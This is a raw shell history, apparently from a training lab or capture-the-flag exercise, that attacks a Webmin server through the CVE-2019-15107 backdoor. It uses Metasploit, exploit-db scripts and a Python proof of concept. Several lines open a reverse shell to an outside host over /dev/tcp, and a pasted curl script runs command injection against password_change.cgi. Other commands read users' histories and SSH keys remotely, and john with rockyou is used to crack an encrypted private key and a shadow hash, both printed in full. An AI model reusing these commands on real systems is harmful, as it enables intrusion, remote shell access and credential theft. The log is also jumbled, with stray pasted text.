./webmin.sh 100.100.100.5:10000
./webmin.sh 100.100.100.5
./webmin.sh 172.18.1.1:10000
./webmin.sh 172.18.1.1
metasploit
msfconsole
use 47230.rb
show targets
set TARGET 0
exploit
show options
set TARGETURI /root/
show options
set RHOSTS 172.18.1.1
exploit
use exploit/unix/webapp/webmin_backdoor 
show options
exploit
set TARGET 0
exploit
set RHOSTS 172.18.1.5
exploit
set LHOST 0.0.0.0
exploit
show options
set TARGETURI /root/
exploit
set TARGETURI /
show options
exploit
set LHOST 127.0.0.1
exploit
ifconfig
ifconfig
set LHOST 192.168.131.153
exploit
show options
set LHOST 10.1.135.83
exploit
check
show options
exploit
netstat -lpn
clear
netstat -a
netstat -na
netstat -a
netstat -a
msfconsole
use exploit/unix/webapp/webmin_backdoor 
show options
ifconfig
set LHOST 10.1.135.83
netstat -a
set RHOST 172.168.1.5
exploit
show options
set TARGET 0
exploit
set RHOST 192.168.1.5
exploit
set RHOST 172.18.1.5
exploit
show options
set TARGET 0
exploit
show options
set TARGET 0
exploit
set TARGET 0
pwd
exploit
set TARGET 0
exploit
set TARGET 0
touch key.txt
cd
ls
./ssh2john.py ~/Desktop/key.txt > hash
ls
man john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
msfconsole
use /exploit/unix/webapp/webmin_backdoor
use exploit/unix/webapp/webmin_backdoor 
show options
set RHOST 172.18.1.5
set TARGET 0
ifconfig
set LHOST 10.1.135.83
ssh -i key.txt eve@10.1.17.45
ssh -i key.txt eve@10.1.17.4
ssh -i key.txt eve@10.1.17.4
chmod 777 key.txt
ssh -i key.txt eve@10.1.17.4
chmod 400 key.txt
ssh -i key.txt eve@10.1.17.4
ls
cd top-secret/
ls
cat flag.txt
nmap --help
nmap -v 172.18.1.5
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor 
show options
set rhosts 172.18.1.5
run
set lhost 10.1.135.83
run
cd /root/.ssh
cd .ssh
ls
ls -la
ssh-keygen -t rsa
show options
run
python -c 'import subprocess; p=subprocess.call(["/bin/sh","-i"]);'
nc -nvlp 225
cd .
cd ..
ls -la
ls
ls -la
ls -a
ls -l
ssh eve@10.1.17.4 --help
ssh -i eve.key eve@10.1.17.4
chown key.eve 0644
chmod key.eve 0644
chmod 0644 key.eve
ls
chmod 0644 eve.key
ssh -i eve.key eve@10.1.17.4
sudo ssh -i eve.key eve@10.1.17.4
chmod 0700 eve.key
ssh -i eve.key eve@10.1.17.4
ssh2john eve.key > eve.hash
locate ssh2john.py
python ssh2john.py eve.key > eve.hash
ls
cat eve.hash
john eve.hash -wordlist=rockyou.txt
locate rockyou.txt
john eve.hash -wordlist=/usr/share/wordlists/rockyou.txt
ssh -i eve.key eve@10.1.17.4
ls
ls -la
cd top-secret/
ls -la
cat flag.txt
nmap
nmap -v -A  172.18.1.5
nmap -F  172.18.1.5
git clone htpps://github.com/vulnersCom/nmap-vulners/usr/share/nmap/scripts/vulners
git clone https://github.com/vulnersCom/nmap-vulners/usr/share/nmap/scripts/vulners
nmap =sV =Pn 172.18.1.5
nmap -sV -Pn 172.18.1.5
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
nmap -sV --script=vulscan/vulscan.nse 172.18.1.5
cd /usr/share/nmap/scripts/
git clone https://github.com/vulnersCom/nmap-vulners.git
nmap --script nmap-vulners -sV 172.18.1.5 -p10000
class MetasploitModule < Msf::Exploit::Remote
ping 172.18.1.5
nmap -p 60000-65536
nmap -p 60000-65535
nmap 172.18.1.5 -p 60000-65535
nmap 172.18.1.5 -p 40000-60000
nmap 172.18.1.5 -p 20000-40000
nmap 172.18.1.5 -p 1000-20000
exit
help
man msf
man msfconsole
msfconsole
help
nmap 172.18.1.5 -p 10000
man nmap
nmap 172.18.1.5 -p 10000 -sV
nikto -Help
exit
use exploit/linux/http/webmin_backdoor
ls -a
cd .msf4
ls
cd modules
ls
ls -a
cd ~
search webmin
cd exploit
search exploit/linux/http
search exploit/linux/http/webmin
info exploit/linux/http/webmin_packageup_rce
searchsploit webmnin
exit
apt update
apt install metasploit-framework
ls /usr/share/metasploit-framework
ls /usr/share/metasploit-framework/modules
ls /usr/share/metasploit-framework/modules/exploits
ls /usr/share/metasploit-framework/modules/exploits/linux
ls /usr/share/metasploit-framework/modules/exploits/linux/http
ls /usr/share/metasploit-framework/modules/exploits/linux
msfconsole
search webmin
search webmin_back
search webmin_backdoor
use exploit/linux/http/webmin_backdoor.rb
show targets
show options
help
show options
set LHOST 172.18.1.5
show options
set LHOST
exit
msfconsole
use exploit/linux/http/webmin_backdoor.rb
show options
set RHOSTS 172.18.1.5
show options
exploit
ifconfig
set LHOST 0.0.0.0
exploit
run
show options
show missing
show targets
check 172.18.1.5
show targets
show options
set target 0
show options
run
check 172.18.1.5
back
use exploit/linux/http/webmin_backdoor.rb
check 172.18.1.5
show options
show targets
set target 1
check 172.18.1.5
exit
msfconsole
use exploit/linux/http/webmin_backdoor
show targets
show options
check 172.18.1.5
ifconfig
set LHOST 10.1.135.83
check 172.18.1.5
run
set RHOSTS 172.18.1.5
run
nmap -sn 172.18.1.5/24
arp -a
nmap 172.18.1.1
arp -a
nmap 147.251.6.10
show options
ifconfig
msfconsole
use exploit/linux/http/webmin/backdoor
use exploit/linux/http/webmin/backdoor.rb
use exploit/linux/http/webmin/backdoor.br
use exploit/linux/http/webmin_backdoor
show options
set RHOSTS 172.18.1.5
ifconfig
set LHOST 10.1.135.83
run
check 172.18.1.5
nmap 10.1.17.4
echo eve:$6$024QHRGPtY7RBi.t$5mfgbDY10e7Q3HiWd2YcHRY2KWj7BRWobrSCe5kCBSw3ZMwEfFvxO625d9aQyswMr9hEGF79I1KvwswSzsklp/:18451:0:99999:7::: > shadow
cat shadow
echo eve:x:1003:1003::/home/eve:/bin/bash > passwd
ls
unshadow passwd shadow > mypasswd.txt
ls
cat mypasswd.txt
john mypasswd.txt
john shadow
echo eve:$6$024QHRGPtY7RBi.t$5mfgbDY10e7Q3HiWd2YcHRY2KWj7BRWobrSCe5kCBSw3ZMwEfFvxO625d9aQyswMr9hEGF79I1KvwswSzsklp/:18451:0:99999:7::: > shadow
cat shadow
echo "eve:$6$024QHRGPtY7RBi.t$5mfgbDY10e7Q3HiWd2YcHRY2KWj7BRWobrSCe5kCBSw3ZMwEfFvxO625d9aQyswMr9hEGF79I1KvwswSzsklp/:18451:0:99999:7:::" > shadow
cat shadow
nano shadow
cat shadow
unshadow passwd shadow > mypasswd.txt
john mypasswd.txt
run
echo "-----BEGIN RSA PRIVATE KEY-----"
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
Ps9uCxB/vjzzEwZU+BjohF/sb/kaa+thfeYki9iFGqVQpHbPhdZU7JO2rKTU3w4k
...
sah7VmkiXIRvhXdcVA/QXlpG7NfOVGfm/zVDfpWPAGUrGegNb3X5Y6QTzDE4lhcK
nano id_rsa
file id_rsa
john id_rsa
john --format=SSH id_rsa
ssh2john id_rsa > id_rsa.hash
cat id_rsa
/usr/sbin/ss2john
/usr/sbin/ssh2john
locate ssh2john
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash
cat id_rsa.hash
john id_rsa.hash
ls /usr/share
ls /usr/share/wordlists
john id_rsa.hash --wordlist=/usr/share/wordlists
john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
nmap 172.18.1.15
nmap -Pn 172.18.1.15
nmap -Pn -p- 172.18.1.15
ls
nmap 172.18.1.5
nmap -sC 172.18.1.5
nmap -sV 172.18.1.5
nmap -sC -sV -p 10000 172.18.1.5
msfconsole
search miniserv
search Miniserv
search 1.920
search webmin
searchsploit webmin
searchsploit -m exploits/linux/remote/47230.rb
nano /usr/share/exploitdb/exploits/linux/remote/47230.rb
chmod +x /usr/share/exploitdb/exploits/linux/remote/47230.rb
cd /usr/share/exploitdb/exploits/linux/remote/
ls
./47230.rb
use /usr/share/exploitdb/exploits/linux/remote/47230.rb
search 1.920
ruby 47230.rb
./47230.rb
nano 47230.rb
use exploit/unix/webapp/webmin_backdoor
show options
set LHOST=10.1.135.83
show options 
set LHOST=10.1.153.83
set LHOST 10.1.153.83
exploit
show options
set RHOSTS 172.18.1.5
exploit
set RPORT 10000
exploit 
show options 
set LHOST 192.168.129.103
exploit 
cat /root/flag
cd /root/ | ls -la
cat config
cat webmin.schema
cat help
ls
cat module.info.cz
cat schema.cgi
cat config
ls
cat webmin.schema
ls
cat schema.cgi
cat backup_config.pl
ls -la
cat config.info.hr
ls
find /root/*[0-9][0-9][0-9][0-0][0-9]
find /root/*[0-9][0-9][0-9][0-0][0-9]*
grep -rnw "/root/"
wget http://raw.githubusercontent.com/petrmarinec/awdawd/master/FILE
ls
cat FILE
grep -rnw "/root/" -e '[0-9]+([^0-9]+[0-9]+){4}'
ls
y
cd /root/
ls
cat WARNING-READ-ME.txt
ifconfig
nmap 172.18.1.5/24
ps aux
ifconfig
nmap 172.18.1.5
nmap 172.18.1.5/24
nmap 172.18.1.1
nmap 172.18.1.1/24
nmap 172.18.1.5
ls
cat WARNIN-READ-ME.txt
cat WARNING-READ-ME.txt
ls
cd /root/
ls
cat WARNING-READ-ME.txt
ls
ifconfig
fping -ag 172.18.1.5/24
apt get-install nmap
nmap
ls
cd /var
ls
cd webmin
ls
cat miniserv.log
clear
export TERM=xterm
clear
l
ls
cd ..
ls
cd backups
ls
cd /home
ls
cd alice
ls
ls -la
cat .bashrc
cd ..
ls
cd bob
ls
cd ..
cd debian
ls
cd ..
cd eve
ls
cd ..
cd bob
cd /var
ls
cd local
ls
cd ..
cd webmin
ls
ls
cat miniserv.log
ls
nmap
ls
cd ..
ls
cd backusp
ls
cd backups
ls
cat passwd.bak
clear
ls
cd ..
cd ..
ls
cd /home
ls
cd /home
ls
cd alice
ls
ls -la
cat .bash_logout
cd ..
ls
cd bob
ls
ls -la
cat .profile
cd ..
ls
cd debian
ls -la
cat .bashrc
ls
ls -la
cat .ansible
cd .ansible
ls
cd tmp
ls
ls -la
cd ..
ls -la
ls
cd ..
ls
ls -la
cat .bash_logout
ls
msfconsole
use unix/webapp/webmin_backdoor
show options
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
cat .progle
ls
cd /root/
export TERM=xterm
clear
ls
cd /home
ls
cd eve
ls
ls -la
cat .bash_history
cd /var/www
ls
cd /var
ls
cd webmin
ls
cat blocked
cd blocked
cd ..
ls
cd local
ls
cd ..
ls
scp 10.1.17.4
ls
ssh 10.1.17.4
ls
cd backups
ls
cat passwd.bak
ls
cd ..
l
sls
ls
cd local
ls
cd ..
cd log
ls
cat user.log
ls
cd ..
l
ls
cd lock
l
sls
cd ..
ls
cd mail
ls
cd ..
find / -perm -4000 2>/dev/null
ls
cd webmin
ls
cd ..
ls
ifconfig
ls
ls
ls
cd /home
ls
cd eve
cd .ssh
ls
exploit
ssh -i id_rsa -l eve 10.1.17.4
cd /home/eve
ls
cd .ssh
l
ls
ssh -i id_rsa eve@10.1.17.4
cat id_rsa
ssh2john
cat id_rsa
touch id_rsa
nano id_rsa
nano id_rsa
ls
ss2john.py id_rsa
python ssh2john.py id_rsa
python ssh2john.py id_rsa > hash
john hash
ls
ls
cat id_rsa
john hash
cd /usr/share/
ls
cd wordlists/
ls
john /root/hash --wordlist=rockyou.txt
ssh -i id_rsa eve@10.1.17.4
ls
cat top-secret
cd top-secret
ls
cat flag.txt
ifconfig
nmao
nmap
nmap
ifconfig
nmap -h
curl
ifconfig
git clone github.com/jas502n/CVE-2019-15107
git clone https://github.com/jas502n/CVE-2019-15107
python CVE_2019_15107.py https://172.18.1.5:10000 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
ls
ls -la
drwx------  3 root root  4096 Apr  7 11:39 .gnupg
drwxr-xr-x  3 root root  4096 Jul 15 09:27 .local
drwxr-xr-x  2 root root  4096 Jul 15 09:27 Music
drwxr-xr-x  2 root root  4096 Jul 15 09:27 Pictures
git clone https://github.com/jas502n/CVE-2019-15107
cd
ls
cd CVE-2019-15107/
ls
python CVE_2019_15107.py https://172.18.1.5:10000 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
python CVE_2019_15107.py http://172.18.1.5:10000 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
ncat -l 8080
sudo apt install ncat
ncat -l 8080
ncat -i 8080
ncat -l 8080
python CVE_2019_15107.py http://172.18.1.5:10000 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
python CVE_2019_15107.py http://172.18.1.5:10000 'id'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat ./.bash_history'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat home/eva/.bash_history'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat home/bob/.bash_history'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat home/debian/.bash_history'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls home/debian/'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home/debian/'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -la'
python CVE_2019_15107.py http://172.18.1.5:10000 'cd /home ; ls'
module.info.pt_BR.UTF-8
module.info.ru.UTF-8
module.info.ru_RU
module.info.ru_RU.UTF-8
module.info.ru_SU
module.info.sk
module.info.sk.UTF-8
module.info.sv
module.info.sv.UTF-8
module.info.tr
module.info.zh_CN
module.info.zh_TW.Big5
negativeacl
openssl.cnf
postinstall.pl
save_acl.cgi
save_group.cgi
save_pass.cgi
save_sql.cgi
save_sync.cgi
save_twofactor.cgi
save_unix.cgi
save_user.cgi
schema.cgi
switch.cgi
system_info.pl
twofactor.pl
twofactor_form.cgi
useradmin_update.pl
webmin.schema
python CVE_2019_15107.py http://172.18.1.5:10000 'cd /home ; ls -la'
rwxr-xr-x   6 root bin 12288 Jul  4  2019 .
drwxr-xr-x 132 root bin 12288 Jul  4  2019 ..
drwxr-xr-x   3 root bin  4096 Jul  4  2019 Authen-SolarisRBAC-0.1
python CVE_2019_15107.py http://172.18.1.5:10000 'cd / ; ls -la'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home/alice'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -la /home/alice'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -la /home/debian'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -la /home/eve'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat /home/eve/.bash_history'
ervices
echo '81.2.195.254' >> ~/top-secret/too_dangerous.txt
2.195.254
cat /etc/services
less /etc/services
python CVE_2019_15107.py http://172.18.1.5:10000 'cat /home/bob/.bash_history'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -la /home/bob'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat /home/eve/.bash_history'
ssh 10.1.18.22
ssh 10.1.17.4
python CVE_2019_15107.py http://172.18.1.5:10000 'ssh eve@10.1.17.4'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat /home/eve/.ssh'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home/eve/'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat /home/eve/.ssh'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat /home/eve/.bash_history'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home/eve/'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -la /home/bob'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -la /home/eve'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -la /home/eve/.ssh/'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat /home/eve/.ssh/id_rsa'
touch id_rsa
nano id_rsa
python CVE_2019_15107.py http://172.18.1.5:10000 'cat /home/eve/.ssh/id_rsa.pub'
touch id_rsa.pub
nano id_rsa.pub
ssh eve@10.1.17.4
cd ..
ls
cd .ssh
ls
ls -la
chmod 600 id_rsa
ls -la
ssh eve@10.1.17.4
gpg2john id_rsa
scp -r * eve@10.1.17.4:/home/eve/
ls
cd ..
ls
cd etc
ls
cd ...
cd ..
ls
cd root
ls
ssh 172.18.1.5 -p 10000
ssh 172.18.1.5
metasploit
metasploit
service postgresql start
msfsplayload
msfplayload
msf
msfconsole
cd ..
cd home
cd root
cd debian
cd
cd ..
exit
msfconsole
cd ..
cd root
info
help search
search 1.920
use exploit/unix/webapp/webmin_backdoor 
show options
set vhost
set lhost 10.1.135.83
set lhost 172.18.1.5 
set lport 10 000
set lport 10000
exploit
set rhost 172.18.1.5
ifconfig
set lhost 10.1.135.83
exploit
set rport 10000
set lhost
exploit
ls
ls
cd ..
exit
ls
ls
mfsconsole
ls
msfconsole
show options
set rhost 172.18.1.5
set rport 
exit
ls
msfconsole
set rport 10000
set shost
set rhost
set rhost 172.18.1.5
set lhost 10.1.135.83
show options
use 1.920
set lhost
set rhost
set rhost 172.18.1.5
set rport 10000
ls
cd /root
ls
ls
cd ..ls
cd ..
ls
home
cd
ls
cd ..
ls
cd home
ls
cd eve
ls
cd ..
ls
cd
ls
ls
cd ..
ls
cd home
ls
cd alice
ls
cd ..
ls
cd bob
ls
cd
l
ls
c d..
locate
find
./.bash_historysa
./.bash_history
sudo ./.bash_history
id_rsa
ssh2john.py
find ssh2john.py
ls
cd ..
ls
cd home
ls
cd eve
ls
id
id_rsa eve
ls
ls
lsa
ls a
la
ls a
list all
list
lsa
ssh eve@10.1.17.4
ls
cd ..
cd ..
ls
john hash
john bash
/home/eve/.ssh# ssh -l id_rsa eve@172.17.5.4
nmap 172.18.1.5
nmap 172.18.1.5 -p 10000
J8 cd Downloads/
ls
cd Downloads/
ls
sh 47293.sh 172.18.1.5:10000
bash 47293.sh 172.18.1.5:10000
nano utok.sh
sh utok.sh 172.18.1.5:10000
nano utok.sh
msfconsole
exit
msfconsole
use unix/webapp/webmin_backdoor
help
show options
set RHOSTS 172.18.1.5
exploit
ip a
set LHOST 192.168.131.85
exploit
exit
quit
exit -y
clear
namp 172.18.1.1/24
nmap 172.18.1.1/24
nmap 10.0.1.1/24
nmap 10.1.0.1/24
nmap 100.100.100.1/24
msfconsole
use unix/webapp/webmin_backdoor
set LHOST 192.168.131.85
nmap 172.168.1.1/24
nmap 172.18.1.1/24
set RHOSTS 172.18.1.5
nmap 10.1.0.1/24
exploit
show options
curl 172.18.1.5:10000
exploit
clear
nmap 10.1.17.4
nano key.txt
chmod 600 key.txt
ssh -i key.txt eve@10.1.17.4
ssh -i key.txt eve@10.1.17.4
ssh -i key.txt eve@10.1.17.4
ls
./ssh2john.py
./ssh2john.py key.txt
./ssh2john.py key.txt > sshjohn.txt
ls
man john
john --single sshjohn.txt
john --show sshjohn.txt
john --single sshjohn.txt
john --show sshjohn.txt
john -i sshjohn.txt
john --incremental sshjohn.txt
ls
gunzip /usr/share/wordlists/rockyou.txt.gz
clear
john --wordlist /usr/share/wordlists/rockyou.txt sshjohn.txt
ssh -i key.txt eve@10.1.17.4
ssh -i key.txt eve@10.1.17.4
ls
cd top-secret/
ls
cat flag.txt
nmap 172.18.1.5
metasploit
metasploit
msfconsole
msfconsole
sudo service postgresql start
msfdb init
msfconsole
db_nmap 172.18.1.5
help
analyze
show exploits
cd Downloads/
ls
chmod
chmod +x 47293.sh
./47293.sh
vi 47293.sh
cd Downloads/
./47293.sh 47293.sh http://172.18.1.5:10000/
./47293.sh 47293.sh http://172.18.1.5:10000
sh 47293.sh 47293.sh http://172.18.1.5:10000
sh 47293.sh 47293.sh http://172.18.1.5:10000
cat 47293.sh
sh 47293.sh 47293.sh http://172.18.1.5:10000
vim CVE-2019-15107.sh
sh CVE-2019-15107.sh
sh CVE-2019-15107.sh #!/bin/sh
FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI=$1;
echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1
if [ $? -eq 0 ]; then echo '\033[0;31mVULNERABLE!\033[0m'; else echo '\033[0;32mOK! (target is not vulnerable)\033[0m'; fi
ls
cat CVE-2019-15107.sh
cat CVE-2019-15107.sh http://172.18.1.5:10000
sh CVE-2019-15107.sh http://172.18.1.5:10000
msfconsole
exit
msfcli
msfconsole
show exploit
search CVE-2019-15107
use exploit/unix/webapp/webmin_backdoor 
check
set RHOSTS https://localhost:10000
set RHOST https://localhost:10000
show options
set RHOST 172.18.1.5
show options
check
exploit
check
exploit
set LHOST 0.0.0.0
exploit
show
show options
exploit
set LHOST 10.1.135.83
exploit
msfconsole
check
exit
use exploit/unix/webapp/webmin_backdoor
set RHOST 172.18.1.5
set LHOST 10.1.135.83
check
ssh 172.18.1.5
ssh 172.18.1.5:39680
ssh localhost:4444
ssh 127.0.0.1:4444
ssh 127.0.0.1 -p 4444
msfconsole
use exploit/unix/webapp/webmin_backdoor 
set RHOST 172.18.1.5
set LHOST 10.1.135.83
check
exploit
ssh 172.18.1.5
ssh kocm@172.18.1.5
ssh 172.18.1.5
vi key
john key
john .-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
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
john --wordlist=-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
Ps9uCxB/vjzzEwZU+BjohF/sb/kaa+thfeYki9iFGqVQpHbPhdZU7JO2rKTU3w4k
2OG1q9DAD07fQPpCmX5vqWAdmeaWq//2k3zRVsadFF3daPGjWs1f61j4/JqYBSDl
yeX8g98mtBLBas7bUFuo4jVroEUaoF0fpa0Up+mOAC3rY3tsprpfofQu+uoXaRRJ
Bq2CuS5LcqbfVfl9737XeC+DNls/AmkLmYU/1NLKp1hWSpx0/dfJu725tDOtR6zB
9lS9eEPebv4V8mUNU+bsh5YQbVrVmryO9BRLBl4ZK82SO7tnyObpWfsa2jLGg4Mp
N/jFdUnWSkA2wEgzupDZmPU6jyJ/BosOxJVkih4oQB1s9BO+HzI7oA5sDfO/gw1R
BdC2V8RnF8i8gwppc2eenbU/PIdDTu6M2LTO4aAM5wxwKXgkTdJuUxmNH4DCFgZ+
/DJyNP3xqCknFLIVTBwVSsHqnHSN6ZCl8BteFdRsf6kAj6qm1/cAfL73otlGZyR7
5PHI1jf+WoJVaRKQLzFfaMrY0rhU6TsQTYdm2QYcSszE1fhLdXGNKpathYz1sUhe
RPbgJfB0PuzwpzcKesh5j+AnjKQjZcG1vHnrgvDFnd5VNOOrTzdUnMA0DwwVwm2S
vkjUvPbdIkQlNuBL0FWZl/2vHf/xWWex4Q0plLf7lRWJsCDtiKflKHL/SBFYVy0F
TwKMZJ4885lBJfN3AG9kj4azCLK6IcAuRoxTmAtYrntQWLtDCHyaCW6dZItCtQK2
pghYqk7inYawVLDG9f5ej+1MYQNfScZYpQ/IEH2jfbRgQsXj7zgtS9ewQoyqBY2o
TC+mWTFkXW5YlN9Bu1uZ2CgYQJF0Dx1ns5x3IeF+U5z56KRqaKFJPfRQgTg62m7e
0v/8aKPlPwfmS28OtxtE96zQI3SAAy7AdwkBepz5Pk9iotqIQPk5fY68wBG67v+a
d712Dnn4OPYaqzMTyWz/dRiWcax9bFhNV+9Gp1OoA7hhBO5daLoul3EYx54vd8N3
